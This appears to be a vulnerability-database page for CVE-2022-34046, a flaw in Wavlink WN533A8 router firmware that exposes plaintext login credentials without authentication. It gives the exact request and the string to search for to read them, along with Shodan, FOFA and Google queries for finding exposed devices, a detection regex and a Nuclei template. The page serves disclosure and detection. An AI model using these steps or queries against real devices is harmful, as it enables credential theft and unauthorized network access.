CVE-2022-34046
published 2022-07-20CVE-2022-34046: An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via…
PriorityP262high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
16.58%
96.6th percentile
An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);].
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavlink | wn533a8_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
otherGET /sysinit.shtml?r=52300 HTTP/1.1
yara
regex: syspasswd="(.+?)"
- →Match HTTP 200 response body containing both 'var syspasswd="' and 'APP' strings to confirm credential exposure on the target endpoint.
- →Use Shodan queries 'http.title:"Wi-Fi APP Login"', 'http.html:"wavlink"', or 'http.title:"wi-fi app login"' to identify exposed Wavlink WN533A8 devices on the internet.
- →Use FOFA queries 'title="wi-fi app login"' or 'body="wavlink"' to identify exposed Wavlink WN533A8 devices.
- →Use Google dork 'intitle:"wi-fi app login"' to discover internet-facing Wavlink WN533A8 login pages.
- ·The vulnerability is unauthenticated — no credentials are required to access the sensitive endpoint and retrieve plaintext usernames and passwords. ↗
- ·The affected firmware version is specifically M33A8.V5030.190716; detections should be scoped to this version of the Wavlink WN533A8 firmware. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Wavlink WN533A8 - Password Disclosure
exploitdb·2022-08-01·CVSS 7.5
CVE-2022-34046 [HIGH] Wavlink WN533A8 - Password Disclosure
Wavlink WN533A8 - Password Disclosure
---
# Exploit Title: Wavlink WN533A8 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34046
# Tested on: Windows
# Exploit
view-source:http://IP_ADDRESS/sysinit.shtml
search for var syspasswd="
you will find the username and the password
Nuclei
WAVLINK WN533A8 - Improper Access Control
nuclei·CVSS 7.5
CVE-2022-34046 [HIGH] WAVLINK WN533A8 - Improper Access Control
WAVLINK WN533A8 - Improper Access Control
WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2022-34046
info:
name: WAVLINK WN533A8 - Improper Access Control
author: For3stCo1d
severity: high
description: |
WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute u
No writeups or analysis indexed.
http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.htmlhttps://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharinghttp://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.htmlhttps://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
2022-07-20
Published